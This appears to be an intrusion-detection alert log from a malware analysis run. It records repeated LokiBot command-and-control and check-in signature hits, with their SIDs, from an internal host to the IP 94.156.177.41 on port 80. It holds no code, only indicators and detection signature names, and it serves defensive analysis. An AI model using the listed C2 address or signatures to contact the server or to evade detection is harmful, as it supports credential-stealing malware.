2024-11-28T09:15:06.031420+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:07.898325+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:09.702160+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:11.605394+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:13.478183+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:15.453442+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:17.303515+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:19.281950+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:21.096193+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:22.994413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:24.699039+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:26.498742+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:28.371147+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:30.274220+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:32.168060+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:34.019143+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:35.875260+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:37.777782+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:39.432277+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:41.183582+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:42.916927+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:44.758427+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:46.605174+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:48.264914+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:50.179950+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:51.927975+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:53.838780+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:55.578098+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:57.305447+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:59.102043+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:16:00.808598+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:02.508043+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:04.174440+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:06.009910+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:07.709410+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:09.414886+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:11.219184+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:13.036489+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:14.719923+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:16.432519+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	50012	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:19.966495+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:21.741705+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:23.475744+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:25.137665+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:27.269118+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:28.997689+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:30.852920+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:32.658743+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:34.411968+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:36.257830+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:38.125230+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:39.946419+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:41.795444+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:43.957647+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:45.763443+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:47.672120+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:49.534406+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:51.346606+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:53.209909+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:55.171476+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:57.022105+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:58.886053+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:15:00.692482+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:02.364424+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:04.221399+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:06.031420+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:07.898325+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:09.702160+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:11.605394+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:13.478183+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:15.453442+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:17.303515+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:19.281950+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:21.096193+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:22.994413+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:24.699039+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:26.498742+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:28.371147+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:30.274220+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:32.168060+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:34.019143+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:35.875260+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:37.777782+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:39.432277+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:41.183582+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:42.916927+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:44.758427+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:46.605174+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:48.264914+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:50.179950+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:51.927975+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:53.838780+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:55.578098+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:57.305447+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:59.102043+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:16:00.808598+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:02.508043+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:04.174440+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:06.009910+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:07.709410+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:09.414886+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:11.219184+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:13.036489+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:14.719923+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:16.432519+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	50012	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:15.096111+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:16.856131+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:18.697511+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:20.351381+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:22.160780+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:23.860632+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:25.519659+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:27.668725+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:29.385370+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:31.235320+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:33.051469+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:34.797317+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:36.663456+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:38.518570+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:40.330195+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:42.534473+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:44.345691+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:46.159487+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:48.063766+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:49.922881+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:51.737036+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:53.691338+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:55.562437+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:57.414725+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:59.272741+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:01.091239+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:02.750976+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:04.611133+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:06.425627+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:08.283034+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:10.092587+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:11.986718+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:13.869864+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:15.847454+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:17.771783+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:19.671910+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:21.490327+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:23.380781+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:25.077799+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:26.899973+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:28.747512+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:30.655415+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:32.556717+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:34.408050+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:36.267971+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:38.156180+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:39.816583+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:41.597339+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:43.294626+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:45.140468+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:46.988970+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:48.663942+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:50.622383+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:52.328756+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:54.218254+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:55.988730+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:57.686634+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:59.487158+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:01.189356+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:02.889650+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:04.587142+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:06.389002+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:08.095796+0100	2021641	1	A Network Trojan was detected	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:09.797793+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:11.614597+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:13.446836+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:15.111182+0100	2021641	1	A Network Trojan was detected	192.168.2.7	50012	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:15.096111+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:16.856131+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:18.697511+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:20.351381+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:22.160780+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:23.860632+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:25.519659+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:27.668725+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:29.385370+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:31.235320+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:33.051469+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:34.797317+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:36.663456+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:38.518570+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:40.330195+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:42.534473+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:44.345691+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:46.159487+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:48.063766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:49.922881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:51.737036+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:53.691338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:55.562437+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:57.414725+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:59.272741+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:01.091239+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:02.750976+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:04.611133+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:06.425627+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:08.283034+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:10.092587+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:11.986718+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:13.869864+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:15.847454+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:17.771783+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:19.671910+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:21.490327+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:23.380781+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:25.077799+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:26.899973+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:28.747512+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:30.655415+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:32.556717+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:34.408050+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:36.267971+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:38.156180+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:39.816583+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:41.597339+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:43.294626+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:45.140468+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:46.988970+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:48.663942+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:50.622383+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:52.328756+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:54.218254+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:55.988730+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:57.686634+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:59.487158+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:01.189356+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49976	94.156.177.41	80	TCP
